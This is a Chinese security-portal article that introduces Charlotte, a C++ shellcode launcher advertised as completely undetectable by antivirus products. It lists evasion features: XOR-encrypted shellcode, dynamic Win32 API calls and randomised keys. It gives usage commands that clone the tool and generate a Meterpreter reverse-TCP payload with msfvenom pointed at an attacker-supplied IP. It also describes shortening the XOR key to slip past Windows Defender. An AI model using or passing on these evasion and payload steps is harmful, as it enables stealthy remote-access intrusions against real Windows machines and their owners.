freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

Charlotte:完全不会被检测到的Shellcode启动器
2021-05-25 07:46:25

关于Charlotte

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

工具特性

截止至2021年5月13日之前,该工具的检测结果为0/26;

该工具支持动态调用Win32 API函数;

对Shellcode和函数名进行异或加密;

每次运行随机化异或密钥和变量;

在Kali Linux上,只需运行“apt-get install mingw-w64*”即可;

支持随机字符串长度和异或密钥长度;

antiscan.me

工具使用

首先,我们需要使用git clone命令将该项目源码克隆至本地,并使用脚本工具生成Shellcode文件。具体操作示例如下:

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

cd charlotte

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

python charlotte.py

使用msfvenom -p测试以及Cobalt Strike原始格式Payload

强化功能

很明显,Windows Defender是能够检测到.DLL代码的,但我们在POC中通过将16字节大小的异或密钥降低至9个字节,就可以规避检测了。

项目地址

Charlotte:【GitHub传送门

# shellcode # shellcode工具
本文为 独立观点,未经允许不得转载,授权请联系FreeBuf客服小蜜蜂,微信:freebee2022
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
+ 加入我的收藏
相关推荐
  • 0 文章数
  • 0 关注者
文章目录